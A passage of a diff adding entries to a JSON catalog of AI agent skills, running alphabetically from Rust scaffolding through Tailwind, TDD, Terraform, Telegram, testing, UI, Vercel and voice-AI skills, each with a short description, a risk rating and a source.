+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "systems-programming-rust-project",
+ "path": "skills/systems-programming-rust-project",
+ "category": "uncategorized",
+ "name": "systems-programming-rust-project",
+ "description": "You are a Rust project architecture expert specializing in scaffolding production-ready Rust applications. Generate complete project structures with cargo tooling, proper module organization, testing",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tailwind-design-system",
+ "path": "skills/tailwind-design-system",
+ "category": "uncategorized",
+ "name": "tailwind-design-system",
+ "description": "Build scalable design systems with Tailwind CSS, design tokens, component libraries, and responsive patterns. Use when creating component libraries, implementing design systems, or standardizing UI...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tailwind-patterns",
+ "path": "skills/tailwind-patterns",
+ "category": "uncategorized",
+ "name": "tailwind-patterns",
+ "description": "Tailwind CSS v4 principles. CSS-first configuration, container queries, modern patterns, design token architecture.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tavily-web",
+ "path": "skills/tavily-web",
+ "category": "uncategorized",
+ "name": "tavily-web",
+ "description": "Web search, content extraction, crawling, and research capabilities using Tavily API",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tdd-orchestrator",
+ "path": "skills/tdd-orchestrator",
+ "category": "uncategorized",
+ "name": "tdd-orchestrator",
+ "description": "Master TDD orchestrator specializing in red-green-refactor discipline, multi-agent workflow coordination, and comprehensive test-driven development practices.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tdd-workflow",
+ "path": "skills/tdd-workflow",
+ "category": "uncategorized",
+ "name": "tdd-workflow",
+ "description": "Test-Driven Development workflow principles. RED-GREEN-REFACTOR cycle.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tdd-workflows-tdd-cycle",
+ "path": "skills/tdd-workflows-tdd-cycle",
+ "category": "uncategorized",
+ "name": "tdd-workflows-tdd-cycle",
+ "description": "Use when working with tdd workflows tdd cycle",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tdd-workflows-tdd-green",
+ "path": "skills/tdd-workflows-tdd-green",
+ "category": "uncategorized",
+ "name": "tdd-workflows-tdd-green",
+ "description": "Implement the minimal code needed to make failing tests pass in the TDD green phase.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tdd-workflows-tdd-red",
+ "path": "skills/tdd-workflows-tdd-red",
+ "category": "uncategorized",
+ "name": "tdd-workflows-tdd-red",
+ "description": "Generate failing tests for the TDD red phase to define expected behavior and edge cases.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tdd-workflows-tdd-refactor",
+ "path": "skills/tdd-workflows-tdd-refactor",
+ "category": "uncategorized",
+ "name": "tdd-workflows-tdd-refactor",
+ "description": "Use when working with tdd workflows tdd refactor",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "team-collaboration-issue",
+ "path": "skills/team-collaboration-issue",
+ "category": "uncategorized",
+ "name": "team-collaboration-issue",
+ "description": "You are a GitHub issue resolution expert specializing in systematic bug investigation, feature implementation, and collaborative development workflows. Your expertise spans issue triage, root cause an",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "team-collaboration-standup-notes",
+ "path": "skills/team-collaboration-standup-notes",
+ "category": "uncategorized",
+ "name": "team-collaboration-standup-notes",
+ "description": "You are an expert team communication specialist focused on async-first standup practices, AI-assisted note generation from commit history, and effective remote team coordination patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "team-composition-analysis",
+ "path": "skills/team-composition-analysis",
+ "category": "uncategorized",
+ "name": "team-composition-analysis",
+ "description": "This skill should be used when the user asks to \\\\\\\"plan team structure\", \"determine hiring needs\", \"design org chart\", \"calculate compensation\", \"plan equity allocation\", or requests...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "telegram-automation",
+ "path": "skills/telegram-automation",
+ "category": "uncategorized",
+ "name": "telegram-automation",
+ "description": "Automate Telegram tasks via Rube MCP (Composio): send messages, manage chats, share photos/documents, and handle bot commands. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "telegram-bot-builder",
+ "path": "skills/telegram-bot-builder",
+ "category": "uncategorized",
+ "name": "telegram-bot-builder",
+ "description": "Expert in building Telegram bots that solve real problems - from simple automation to complex AI-powered bots. Covers bot architecture, the Telegram Bot API, user experience, monetization strategie...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "telegram-mini-app",
+ "path": "skills/telegram-mini-app",
+ "category": "uncategorized",
+ "name": "telegram-mini-app",
+ "description": "Expert in building Telegram Mini Apps (TWA) - web apps that run inside Telegram with native-like experience. Covers the TON ecosystem, Telegram Web App API, payments, user authentication, and build...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "templates",
+ "path": "skills/app-builder/templates",
+ "category": "app-builder",
+ "name": "templates",
+ "description": "Project scaffolding templates for new applications. Use when creating new projects from scratch. Contains 12 templates for various tech stacks.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "temporal-golang-pro",
+ "path": "skills/temporal-golang-pro",
+ "category": "uncategorized",
+ "name": "temporal-golang-pro",
+ "description": "Use when building durable distributed systems with Temporal Go SDK. Covers deterministic workflow rules, mTLS worker configs, and advanced patterns.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "temporal-python-pro",
+ "path": "skills/temporal-python-pro",
+ "category": "uncategorized",
+ "name": "temporal-python-pro",
+ "description": "Master Temporal workflow orchestration with Python SDK. Implements durable workflows, saga patterns, and distributed transactions. Covers async/await, testing strategies, and production deployment.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "temporal-python-testing",
+ "path": "skills/temporal-python-testing",
+ "category": "uncategorized",
+ "name": "temporal-python-testing",
+ "description": "Test Temporal workflows with pytest, time-skipping, and mocking strategies. Covers unit testing, integration testing, replay testing, and local development setup. Use when implementing Temporal wor...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "terraform-aws-modules",
+ "path": "skills/terraform-aws-modules",
+ "category": "uncategorized",
+ "name": "terraform-aws-modules",
+ "description": "Terraform module creation for AWS \u2014 reusable modules, state management, and HCL best practices. Use when building or reviewing Terraform AWS infrastructure.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "terraform-infrastructure",
+ "path": "skills/terraform-infrastructure",
+ "category": "granular-workflow-bundle",
+ "name": "terraform-infrastructure",
+ "description": "Terraform infrastructure as code workflow for provisioning cloud resources, creating reusable modules, and managing infrastructure at scale.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "terraform-module-library",
+ "path": "skills/terraform-module-library",
+ "category": "uncategorized",
+ "name": "terraform-module-library",
+ "description": "Build reusable Terraform modules for AWS, Azure, and GCP infrastructure following infrastructure-as-code best practices. Use when creating infrastructure modules, standardizing cloud provisioning, ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "terraform-skill",
+ "path": "skills/terraform-skill",
+ "category": "uncategorized",
+ "name": "terraform-skill",
+ "description": "Terraform infrastructure as code best practices",
+ "risk": "safe",
+ "source": "https://github.com/antonbabenko/terraform-skill",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "terraform-specialist",
+ "path": "skills/terraform-specialist",
+ "category": "uncategorized",
+ "name": "terraform-specialist",
+ "description": "Expert Terraform/OpenTofu specialist mastering advanced IaC automation, state management, and enterprise infrastructure patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "test-automator",
+ "path": "skills/test-automator",
+ "category": "uncategorized",
+ "name": "test-automator",
+ "description": "Master AI-powered test automation with modern frameworks, self-healing tests, and comprehensive quality engineering. Build scalable testing strategies with advanced CI/CD integration.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "test-driven-development",
+ "path": "skills/test-driven-development",
+ "category": "uncategorized",
+ "name": "test-driven-development",
+ "description": "Use when implementing any feature or bugfix, before writing implementation code",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "test-fixing",
+ "path": "skills/test-fixing",
+ "category": "uncategorized",
+ "name": "test-fixing",
+ "description": "Run tests and systematically fix all failing tests using smart error grouping. Use when user asks to fix failing tests, mentions test failures, runs test suite and failures occur, or requests to ma...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "testing-patterns",
+ "path": "skills/testing-patterns",
+ "category": "uncategorized",
+ "name": "testing-patterns",
+ "description": "Jest testing patterns, factory functions, mocking strategies, and TDD workflow. Use when writing unit tests, creating test factories, or following TDD red-green-refactor cycle.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "testing-qa",
+ "path": "skills/testing-qa",
+ "category": "workflow-bundle",
+ "name": "testing-qa",
+ "description": "Comprehensive testing and QA workflow covering unit testing, integration testing, E2E testing, browser automation, and quality assurance.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "theme-factory",
+ "path": "skills/theme-factory",
+ "category": "uncategorized",
+ "name": "theme-factory",
+ "description": "Toolkit for styling artifacts with a theme. These artifacts can be slides, docs, reportings, HTML landing pages, etc. There are 10 pre-set themes with colors/fonts that you can apply to any artifac...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "threat-mitigation-mapping",
+ "path": "skills/threat-mitigation-mapping",
+ "category": "uncategorized",
+ "name": "threat-mitigation-mapping",
+ "description": "Map identified threats to appropriate security controls and mitigations. Use when prioritizing security investments, creating remediation plans, or validating control effectiveness.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "threat-modeling-expert",
+ "path": "skills/threat-modeling-expert",
+ "category": "uncategorized",
+ "name": "threat-modeling-expert",
+ "description": "Expert in threat modeling methodologies, security architecture review, and risk assessment. Masters STRIDE, PASTA, attack trees, and security requirement extraction. Use for security architecture r...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "threejs-skills",
+ "path": "skills/threejs-skills",
+ "category": "uncategorized",
+ "name": "threejs-skills",
+ "description": "Create 3D scenes, interactive experiences, and visual effects using Three.js. Use when user requests 3D graphics, WebGL experiences, 3D visualizations, animations, or interactive 3D elements.",
+ "risk": "safe",
+ "source": "https://github.com/CloudAI-X/threejs-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tiktok-automation",
+ "path": "skills/tiktok-automation",
+ "category": "uncategorized",
+ "name": "tiktok-automation",
+ "description": "Automate TikTok tasks via Rube MCP (Composio): upload/publish videos, post photos, manage content, and view user profiles/stats. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "todoist-automation",
+ "path": "skills/todoist-automation",
+ "category": "uncategorized",
+ "name": "todoist-automation",
+ "description": "Automate Todoist task management, projects, sections, filtering, and bulk operations via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tool-design",
+ "path": "skills/tool-design",
+ "category": "uncategorized",
+ "name": "tool-design",
+ "description": "Build tools that agents can use effectively, including architectural reduction patterns",
+ "risk": "safe",
+ "source": "https://github.com/muratcankoylan/Agent-Skills-for-Context-Engineering/tree/main/skills/tool-design",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "top-web-vulnerabilities",
+ "path": "skills/top-web-vulnerabilities",
+ "category": "uncategorized",
+ "name": "top-web-vulnerabilities",
+ "description": "This skill should be used when the user asks to \"identify web application vulnerabilities\", \"explain common security flaws\", \"understand vulnerability categories\", \"learn about inject...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "track-management",
+ "path": "skills/track-management",
+ "category": "uncategorized",
+ "name": "track-management",
+ "description": "Use this skill when creating, managing, or working with Conductor tracks - the logical work units for features, bugs, and refactors. Applies to spec.md, plan.md, and track lifecycle operations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "trello-automation",
+ "path": "skills/trello-automation",
+ "category": "uncategorized",
+ "name": "trello-automation",
+ "description": "Automate Trello boards, cards, and workflows via Rube MCP (Composio). Create cards, manage lists, assign members, and search across boards programmatically.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "trigger-dev",
+ "path": "skills/trigger-dev",
+ "category": "uncategorized",
+ "name": "trigger-dev",
+ "description": "Trigger.dev expert for background jobs, AI workflows, and reliable async execution with excellent developer experience and TypeScript-first design. Use when: trigger.dev, trigger dev, background ta...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "turborepo-caching",
+ "path": "skills/turborepo-caching",
+ "category": "uncategorized",
+ "name": "turborepo-caching",
+ "description": "Configure Turborepo for efficient monorepo builds with local and remote caching. Use when setting up Turborepo, optimizing build pipelines, or implementing distributed caching.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "tutorial-engineer",
+ "path": "skills/tutorial-engineer",
+ "category": "uncategorized",
+ "name": "tutorial-engineer",
+ "description": "Creates step-by-step tutorials and educational content from code. Transforms complex concepts into progressive learning experiences with hands-on examples.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "twilio-communications",
+ "path": "skills/twilio-communications",
+ "category": "uncategorized",
+ "name": "twilio-communications",
+ "description": "Build communication features with Twilio: SMS messaging, voice calls, WhatsApp Business API, and user verification (2FA). Covers the full spectrum from simple notifications to complex IVR systems a...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "twitter-automation",
+ "path": "skills/twitter-automation",
+ "category": "uncategorized",
+ "name": "twitter-automation",
+ "description": "Automate Twitter/X tasks via Rube MCP (Composio): posts, search, users, bookmarks, lists, media. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "typescript-advanced-types",
+ "path": "skills/typescript-advanced-types",
+ "category": "uncategorized",
+ "name": "typescript-advanced-types",
+ "description": "Master TypeScript's advanced type system including generics, conditional types, mapped types, template literals, and utility types for building type-safe applications. Use when implementing complex...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "typescript-expert",
+ "path": "skills/typescript-expert",
+ "category": "framework",
+ "name": "typescript-expert",
+ "description": "TypeScript and JavaScript expert with deep knowledge of type-level programming, performance optimization, monorepo management, migration strategies, and modern tooling.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "typescript-pro",
+ "path": "skills/typescript-pro",
+ "category": "uncategorized",
+ "name": "typescript-pro",
+ "description": "Master TypeScript with advanced types, generics, and strict type safety. Handles complex type systems, decorators, and enterprise-grade patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ui-skills",
+ "path": "skills/ui-skills",
+ "category": "uncategorized",
+ "name": "ui-skills",
+ "description": "Opinionated, evolving constraints to guide agents when building interfaces",
+ "risk": "safe",
+ "source": "https://github.com/ibelick/ui-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ui-ux-designer",
+ "path": "skills/ui-ux-designer",
+ "category": "uncategorized",
+ "name": "ui-ux-designer",
+ "description": "Create interface designs, wireframes, and design systems. Masters user research, accessibility standards, and modern design tools.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ui-ux-pro-max",
+ "path": "skills/ui-ux-pro-max",
+ "category": "uncategorized",
+ "name": "ui-ux-pro-max",
+ "description": "UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 9 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind, shadcn/ui). Actions: plan, build, cr...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ui-visual-validator",
+ "path": "skills/ui-visual-validator",
+ "category": "uncategorized",
+ "name": "ui-visual-validator",
+ "description": "Rigorous visual validation expert specializing in UI testing, design system compliance, and accessibility verification.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "unit-testing-test-generate",
+ "path": "skills/unit-testing-test-generate",
+ "category": "uncategorized",
+ "name": "unit-testing-test-generate",
+ "description": "Generate comprehensive, maintainable unit tests across languages with strong coverage and edge case focus.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "unity-developer",
+ "path": "skills/unity-developer",
+ "category": "uncategorized",
+ "name": "unity-developer",
+ "description": "Build Unity games with optimized C# scripts, efficient rendering, and proper asset management. Masters Unity 6 LTS, URP/HDRP pipelines, and cross-platform deployment.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "unity-ecs-patterns",
+ "path": "skills/unity-ecs-patterns",
+ "category": "uncategorized",
+ "name": "unity-ecs-patterns",
+ "description": "Master Unity ECS (Entity Component System) with DOTS, Jobs, and Burst for high-performance game development. Use when building data-oriented games, optimizing performance, or working with large ent...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "unreal-engine-cpp-pro",
+ "path": "skills/unreal-engine-cpp-pro",
+ "category": "uncategorized",
+ "name": "unreal-engine-cpp-pro",
+ "description": "Expert guide for Unreal Engine 5.x C++ development, covering UObject hygiene, performance patterns, and best practices.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "upgrading-expo",
+ "path": "skills/upgrading-expo",
+ "category": "uncategorized",
+ "name": "upgrading-expo",
+ "description": "Upgrade Expo SDK versions",
+ "risk": "safe",
+ "source": "https://github.com/expo/skills/tree/main/plugins/upgrading-expo",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "upstash-qstash",
+ "path": "skills/upstash-qstash",
+ "category": "uncategorized",
+ "name": "upstash-qstash",
+ "description": "Upstash QStash expert for serverless message queues, scheduled jobs, and reliable HTTP-based task delivery without managing infrastructure. Use when: qstash, upstash queue, serverless cron, schedul...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "using-git-worktrees",
+ "path": "skills/using-git-worktrees",
+ "category": "uncategorized",
+ "name": "using-git-worktrees",
+ "description": "Use when starting feature work that needs isolation from current workspace or before executing implementation plans - creates isolated git worktrees with smart directory selection and safety verifi...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "using-neon",
+ "path": "skills/using-neon",
+ "category": "uncategorized",
+ "name": "using-neon",
+ "description": "Guides and best practices for working with Neon Serverless Postgres. Covers getting started, local development with Neon, choosing a connection method, Neon features, authentication (@neondatabase/...",
+ "risk": "safe",
+ "source": "https://github.com/neondatabase/agent-skills/tree/main/skills/neon-postgres",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "using-superpowers",
+ "path": "skills/using-superpowers",
+ "category": "uncategorized",
+ "name": "using-superpowers",
+ "description": "Use when starting any conversation - establishes how to find and use skills, requiring Skill tool invocation before ANY response including clarifying questions",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "uv-package-manager",
+ "path": "skills/uv-package-manager",
+ "category": "uncategorized",
+ "name": "uv-package-manager",
+ "description": "Master the uv package manager for fast Python dependency management, virtual environments, and modern Python project workflows. Use when setting up Python projects, managing dependencies, or optimi...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "varlock-claude-skill",
+ "path": "skills/varlock-claude-skill",
+ "category": "uncategorized",
+ "name": "varlock-claude-skill",
+ "description": "Secure environment variable management ensuring secrets are never exposed in Claude sessions, terminals, logs, or git commits",
+ "risk": "safe",
+ "source": "https://github.com/wrsmith108/varlock-claude-skill",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vector-database-engineer",
+ "path": "skills/vector-database-engineer",
+ "category": "uncategorized",
+ "name": "vector-database-engineer",
+ "description": "Expert in vector databases, embedding strategies, and semantic search implementation. Masters Pinecone, Weaviate, Qdrant, Milvus, and pgvector for RAG applications, recommendation systems, and similar",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vector-index-tuning",
+ "path": "skills/vector-index-tuning",
+ "category": "uncategorized",
+ "name": "vector-index-tuning",
+ "description": "Optimize vector index performance for latency, recall, and memory. Use when tuning HNSW parameters, selecting quantization strategies, or scaling vector search infrastructure.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vercel-automation",
+ "path": "skills/vercel-automation",
+ "category": "uncategorized",
+ "name": "vercel-automation",
+ "description": "Automate Vercel tasks via Rube MCP (Composio): manage deployments, domains, DNS, env vars, projects, and teams. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vercel-deploy-claimable",
+ "path": "skills/vercel-deploy-claimable",
+ "category": "uncategorized",
+ "name": "vercel-deploy-claimable",
+ "description": "Deploy applications and websites to Vercel. Use this skill when the user requests deployment actions such as 'Deploy my app', 'Deploy this to production', 'Create a preview deployment', 'Deploy and...",
+ "risk": "safe",
+ "source": "https://github.com/vercel-labs/agent-skills/tree/main/skills/claude.ai/vercel-deploy-claimable",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vercel-deployment",
+ "path": "skills/vercel-deployment",
+ "category": "uncategorized",
+ "name": "vercel-deployment",
+ "description": "Expert knowledge for deploying to Vercel with Next.js Use when: vercel, deploy, deployment, hosting, production.",
+ "risk": "safe",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "verification-before-completion",
+ "path": "skills/verification-before-completion",
+ "category": "uncategorized",
+ "name": "verification-before-completion",
+ "description": "Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evide...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vexor",
+ "path": "skills/vexor",
+ "category": "uncategorized",
+ "name": "vexor",
+ "description": "Vector-powered CLI for semantic file search with a Claude/Codex skill",
+ "risk": "safe",
+ "source": "https://github.com/scarletkc/vexor",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vibe-code-auditor",
+ "path": "skills/vibe-code-auditor",
+ "category": "uncategorized",
+ "name": "vibe-code-auditor",
+ "description": "Audit rapidly generated or AI-produced code for structural flaws, fragility, and production risks.",
+ "risk": "safe",
+ "source": "original",
+ "date_added": "2026-02-28"
+ },
+ {
+ "id": "videodb-skills",
+ "path": "skills/videodb-skills",
+ "category": "media",
+ "name": "videodb-skills",
+ "description": "Upload, stream, search, edit, transcribe, and generate AI video and audio using the VideoDB SDK.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "viral-generator-builder",
+ "path": "skills/viral-generator-builder",
+ "category": "uncategorized",
+ "name": "viral-generator-builder",
+ "description": "Expert in building shareable generator tools that go viral - name generators, quiz makers, avatar creators, personality tests, and calculator tools. Covers the psychology of sharing, viral mechanic...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "voice-agents",
+ "path": "skills/voice-agents",
+ "category": "uncategorized",
+ "name": "voice-agents",
+ "description": "Voice agents represent the frontier of AI interaction - humans speaking naturally with AI systems. The challenge isn't just speech recognition and synthesis, it's achieving natural conversation flo...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "voice-ai-development",
+ "path": "skills/voice-ai-development",
+ "category": "uncategorized",
+ "name": "voice-ai-development",
+ "description": "Expert in building voice AI applications - from real-time voice agents to voice-enabled apps. Covers OpenAI Realtime API, Vapi for voice agents, Deepgram for transcription, ElevenLabs for synthesis...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "voice-ai-engine-development",
+ "path": "skills/voice-ai-engine-development",
+ "category": "uncategorized",
+ "name": "voice-ai-engine-development",
+ "description": "Build real-time conversational AI voice engines using async worker pipelines, streaming transcription, LLM agents, and TTS synthesis with interrupt handling and multi-provider support",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vr-ar",
+ "path": "skills/game-development/vr-ar",
+ "category": "game-development",
+ "name": "vr-ar",
+ "description": "VR/AR development principles. Comfort, interaction, performance requirements.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "vulnerability-scanner",
+ "path": "skills/vulnerability-scanner",
+ "category": "uncategorized",
+ "name": "vulnerability-scanner",
+ "description": "Advanced vulnerability analysis principles. OWASP 2025, Supply Chain Security, attack surface mapping, risk prioritization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "wcag-audit-patterns",
+ "path": "skills/wcag-audit-patterns",
+ "category": "uncategorized",
+ "name": "wcag-audit-patterns",
+ "description": "Conduct WCAG 2.2 accessibility audits with automated testing, manual verification, and remediation guidance. Use when auditing websites for accessibility, fixing WCAG violations, or implementing ac...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "web-artifacts-builder",
+ "path": "skills/web-artifacts-builder",
+ "category": "uncategorized",
+ "name": "web-artifacts-builder",
+ "description": "Suite of tools for creating elaborate, multi-component claude.ai HTML artifacts using modern frontend web technologies (React, Tailwind CSS, shadcn/ui). Use for complex artifacts requiring state ma...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "web-design-guidelines",
+ "path": "skills/web-design-guidelines",
+ "category": "uncategorized",
+ "name": "web-design-guidelines",
+ "description": "Review UI code for Web Interface Guidelines compliance. Use when asked to \\\"review my UI\\\", \\\"check accessibility\\\", \\\"audit design\\\", \\\"review UX\\\", or \\\"check my site aga...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "web-games",
+ "path": "skills/game-development/web-games",
+ "category": "game-development",
+ "name": "web-games",
+ "description": "Web browser game development principles. Framework selection, WebGPU, optimization, PWA.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "web-performance-optimization",
+ "path": "skills/web-performance-optimization",
+ "category": "uncategorized",
+ "name": "web-performance-optimization",
+ "description": "Optimize website and web application performance including loading speed, Core Web Vitals, bundle size, caching strategies, and runtime performance",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "web-security-testing",
+ "path": "skills/web-security-testing",
+ "category": "granular-workflow-bundle",
+ "name": "web-security-testing",
+ "description": "Web application security testing workflow for OWASP Top 10 vulnerabilities including injection, XSS, authentication flaws, and access control issues.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "web3-testing",
+ "path": "skills/web3-testing",
+ "category": "uncategorized",
+ "name": "web3-testing",
+ "description": "Test smart contracts comprehensively using Hardhat and Foundry with unit tests, integration tests, and mainnet forking. Use when testing Solidity contracts, setting up blockchain test suites, or va...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "webapp-testing",
+ "path": "skills/webapp-testing",
+ "category": "uncategorized",
+ "name": "webapp-testing",
+ "description": "Toolkit for interacting with and testing local web applications using Playwright. Supports verifying frontend functionality, debugging UI behavior, capturing browser screenshots, and viewing browse...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "webflow-automation",
+ "path": "skills/webflow-automation",
+ "category": "uncategorized",
+ "name": "webflow-automation",
+ "description": "Automate Webflow CMS collections, site publishing, page management, asset uploads, and ecommerce orders via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "whatsapp-automation",
